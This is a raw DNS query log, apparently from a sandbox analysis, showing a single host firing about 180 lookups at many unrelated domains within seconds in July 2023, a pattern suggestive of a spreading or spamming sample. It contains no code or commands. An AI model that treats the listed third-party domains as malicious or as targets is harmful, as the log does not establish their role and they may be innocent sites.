                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.527246952 CEST192.168.2.48.8.8.80x3fcaStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.536900997 CEST192.168.2.48.8.8.80x755aStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.551799059 CEST192.168.2.48.8.8.80x6758Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.553396940 CEST192.168.2.48.8.8.80xf4a5Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.616156101 CEST192.168.2.48.8.8.80x4df8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.700484037 CEST192.168.2.48.8.8.80xbadbStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.724771023 CEST192.168.2.48.8.8.80x1cStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.728825092 CEST192.168.2.48.8.8.80xbf14Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.729125023 CEST192.168.2.48.8.8.80xa4f0Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.729506016 CEST192.168.2.48.8.8.80x2fd7Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.776799917 CEST192.168.2.48.8.8.80x280Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.779774904 CEST192.168.2.48.8.8.80x72a9Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.793256044 CEST192.168.2.48.8.8.80x1221Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.877204895 CEST192.168.2.48.8.8.80x1ec3Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.890733957 CEST192.168.2.48.8.8.80x9be9Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.906362057 CEST192.168.2.48.8.8.80x8a5dStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.925930977 CEST192.168.2.48.8.8.80x314bStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.969878912 CEST192.168.2.48.8.8.80x8a8dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.041060925 CEST192.168.2.48.8.8.80xf448Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.055742979 CEST192.168.2.48.8.8.80x4c42Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.083342075 CEST192.168.2.48.8.8.80xfd26Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.142266989 CEST192.168.2.48.8.8.80x5b48Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.150129080 CEST192.168.2.48.8.8.80x7589Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.164098024 CEST192.168.2.48.8.8.80x78b7Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.282538891 CEST192.168.2.48.8.8.80xa18aStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.293582916 CEST192.168.2.48.8.8.80x8a10Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.319078922 CEST192.168.2.48.8.8.80x409dStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.342839956 CEST192.168.2.48.8.8.80x8da9Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.364676952 CEST192.168.2.48.8.8.80x3d3fStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.462167978 CEST192.168.2.48.8.8.80xfc22Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.511293888 CEST192.168.2.48.8.8.80x26e3Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.525475979 CEST192.168.2.48.8.8.80x8d1fStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.525537968 CEST192.168.2.48.8.8.80xf110Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.554867983 CEST192.168.2.48.8.8.80x5256Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.573318958 CEST192.168.2.48.8.8.80xa665Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.573318958 CEST192.168.2.48.8.8.80x82e3Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.668795109 CEST192.168.2.48.8.8.80x6edeStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.694880009 CEST192.168.2.48.8.8.80x612dStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.712028027 CEST192.168.2.48.8.8.80xd598Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.715537071 CEST192.168.2.48.8.8.80x45b4Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.809252977 CEST192.168.2.48.8.8.80x95d5Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.975804090 CEST192.168.2.48.8.8.80x47b2Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.979787111 CEST192.168.2.48.8.8.80xb753Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.076113939 CEST192.168.2.48.8.8.80xcae6Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.082650900 CEST192.168.2.48.8.8.80xd2fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.088951111 CEST192.168.2.48.8.8.80x7d18Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.195029974 CEST192.168.2.48.8.8.80x5310Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.230400085 CEST192.168.2.48.8.8.80xdd94Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.246870995 CEST192.168.2.48.8.8.80x6bdcStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.260698080 CEST192.168.2.48.8.8.80xa826Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.415472031 CEST192.168.2.48.8.8.80xfeecStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.539473057 CEST192.168.2.48.8.8.80xb39aStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.546339035 CEST192.168.2.48.8.8.80xe28aStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.559520006 CEST192.168.2.48.8.8.80x749dStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.568820953 CEST192.168.2.48.8.8.80x29bcStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.575081110 CEST192.168.2.48.8.8.80x183bStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.631421089 CEST192.168.2.48.8.8.80xe8Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.634926081 CEST192.168.2.48.8.8.80x4df8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.663477898 CEST192.168.2.48.8.8.80xbc80Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.864168882 CEST192.168.2.48.8.8.80x7ca0Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.884018898 CEST192.168.2.48.8.8.80x4a6Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.891267061 CEST192.168.2.48.8.8.80x5372Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.898824930 CEST192.168.2.48.8.8.80x7259Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.974339008 CEST192.168.2.48.8.8.80x8037Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.999311924 CEST192.168.2.48.8.8.80x2ebdStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.008198023 CEST192.168.2.48.8.8.80x1fe6Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.025770903 CEST192.168.2.48.8.8.80xa275Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.121006966 CEST192.168.2.48.8.8.80xab59Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.197627068 CEST192.168.2.48.8.8.80xcc97Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.221365929 CEST192.168.2.48.8.8.80xe309Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.280914068 CEST192.168.2.48.8.8.80x2186Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.281821966 CEST192.168.2.48.8.8.80xf82Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.323482990 CEST192.168.2.48.8.8.80x3e2eStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.325356007 CEST192.168.2.48.8.8.80x55e0Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.326457024 CEST192.168.2.48.8.8.80x7ebdStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.346378088 CEST192.168.2.48.8.8.80x37c6Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.407617092 CEST192.168.2.48.8.8.80xe63Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.415704966 CEST192.168.2.48.8.8.80xd2c3Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.610670090 CEST192.168.2.48.8.8.80xb32dStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.638361931 CEST192.168.2.48.8.8.80xeef5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.668159008 CEST192.168.2.48.8.8.80x8d29Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.673315048 CEST192.168.2.48.8.8.80x14e2Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.762511015 CEST192.168.2.48.8.8.80xba09Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.863488913 CEST192.168.2.48.8.8.80x2805Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.875226021 CEST192.168.2.48.8.8.80x7f87Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.902985096 CEST192.168.2.48.8.8.80xf6d7Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.913839102 CEST192.168.2.48.8.8.80x988bStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.913839102 CEST192.168.2.48.8.8.80xb005Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.018023014 CEST192.168.2.48.8.8.80x8037Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.135848999 CEST192.168.2.48.8.8.80x483fStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.226233959 CEST192.168.2.48.8.8.80xd525Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.242757082 CEST192.168.2.48.8.8.80x2f4eStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.301812887 CEST192.168.2.48.8.8.80xe2caStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.366775990 CEST192.168.2.48.8.8.80x8050Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.376257896 CEST192.168.2.48.8.8.80x790cStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.584374905 CEST192.168.2.48.8.8.80x1c14Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.588335037 CEST192.168.2.48.8.8.80x9338Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.627285004 CEST192.168.2.48.8.8.80x2065Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.658380032 CEST192.168.2.48.8.8.80x3047Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.674469948 CEST192.168.2.48.8.8.80xeef5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.683588028 CEST192.168.2.48.8.8.80x8d6aStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.694108009 CEST192.168.2.48.8.8.80x34e1Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.725502014 CEST192.168.2.48.8.8.80x7702Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.801429033 CEST192.168.2.48.8.8.80x2decStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.801687956 CEST192.168.2.48.8.8.80x87b2Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.805056095 CEST192.168.2.48.8.8.80x7033Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.845243931 CEST192.168.2.48.8.8.80x2e7bStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.886934996 CEST192.168.2.48.8.8.80x4b5aStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.045701981 CEST192.168.2.48.8.8.80xebf6Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.047993898 CEST192.168.2.48.8.8.80xb757Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.081551075 CEST192.168.2.48.8.8.80x8037Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.109704971 CEST192.168.2.48.8.8.80xcc7bStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.242459059 CEST192.168.2.48.8.8.80x1ae0Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.277777910 CEST192.168.2.48.8.8.80xbecfStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.288595915 CEST192.168.2.48.8.8.80x2c94Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.299014091 CEST192.168.2.48.8.8.80x7ed0Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.362786055 CEST192.168.2.48.8.8.80xf8c1Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.487771034 CEST192.168.2.48.8.8.80x26b5Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.494934082 CEST192.168.2.48.8.8.80xa127Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.504638910 CEST192.168.2.48.8.8.80xafc9Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.601723909 CEST192.168.2.48.8.8.80x6418Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.649200916 CEST192.168.2.48.8.8.80x5cb6Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.657798052 CEST192.168.2.48.8.8.80xf6ebStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.662554979 CEST192.168.2.48.8.8.80x38ddStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.670703888 CEST192.168.2.48.8.8.80xd3d7Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.670819998 CEST192.168.2.48.8.8.80x20aeStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.671614885 CEST192.168.2.48.8.8.80xc056Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.688673973 CEST192.168.2.48.8.8.80xe09Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.699212074 CEST192.168.2.48.8.8.80xf37bStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.709333897 CEST192.168.2.48.8.8.80xeef5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.842116117 CEST192.168.2.48.8.8.80x6274Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.844980955 CEST192.168.2.48.8.8.80x3da7Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.929495096 CEST192.168.2.48.8.8.80x3644Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.958925009 CEST192.168.2.48.8.8.80x2418Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.000955105 CEST192.168.2.48.8.8.80x72c8Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.014468908 CEST192.168.2.48.8.8.80xf24cStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.027582884 CEST192.168.2.48.8.8.80xe601Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.157619953 CEST192.168.2.48.8.8.80x8a29Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.194051027 CEST192.168.2.48.8.8.80x867bStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.205185890 CEST192.168.2.48.8.8.80x96f8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.273529053 CEST192.168.2.48.8.8.80x1616Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.479095936 CEST192.168.2.48.8.8.80x23caStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.578855038 CEST192.168.2.48.8.8.80x6805Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.604784966 CEST192.168.2.48.8.8.80x249dStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.806355953 CEST192.168.2.48.8.8.80xd3d6Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.816761971 CEST192.168.2.48.8.8.80x59a6Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.844851017 CEST192.168.2.48.8.8.80x645Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.856394053 CEST192.168.2.48.8.8.80x102eStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.898375034 CEST192.168.2.48.8.8.80x78afStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.901335955 CEST192.168.2.48.8.8.80x7ed9Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.059979916 CEST192.168.2.48.8.8.80x5a6fStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.177980900 CEST192.168.2.48.8.8.80xbf60Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.177980900 CEST192.168.2.48.8.8.80x8037Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.187616110 CEST192.168.2.48.8.8.80x4b38Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.366034985 CEST192.168.2.48.8.8.80x586eStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.368779898 CEST192.168.2.48.8.8.80x96f8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.399883032 CEST192.168.2.48.8.8.80xb092Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.473974943 CEST192.168.2.48.8.8.80x4605Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.514703035 CEST192.168.2.48.8.8.80x59bfStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.545609951 CEST192.168.2.48.8.8.80xff9cStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.912878990 CEST192.168.2.48.8.8.80xeef5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.090020895 CEST192.168.2.48.8.8.80x6331Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.492841005 CEST192.168.2.48.8.8.80x96f8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.515166998 CEST192.168.2.48.8.8.80x3be1Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.541851997 CEST192.168.2.48.8.8.80xf431Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.003869057 CEST192.168.2.48.8.8.80xd69cStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.741960049 CEST192.168.2.48.8.8.80xb0bcStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.746654034 CEST192.168.2.48.8.8.80x5cd3Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.935642958 CEST192.168.2.48.8.8.80x80c8Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.936356068 CEST192.168.2.48.8.8.80x8698Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.937542915 CEST192.168.2.48.8.8.80x4a49Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.939758062 CEST192.168.2.48.8.8.80x5eb7Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.991151094 CEST192.168.2.48.8.8.80x271dStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.993019104 CEST192.168.2.48.8.8.80x663bStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.994436026 CEST192.168.2.48.8.8.80x364bStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.996124029 CEST192.168.2.48.8.8.80x639dStandard query (0)hamaker.netA (IP address)IN (0x0001)false
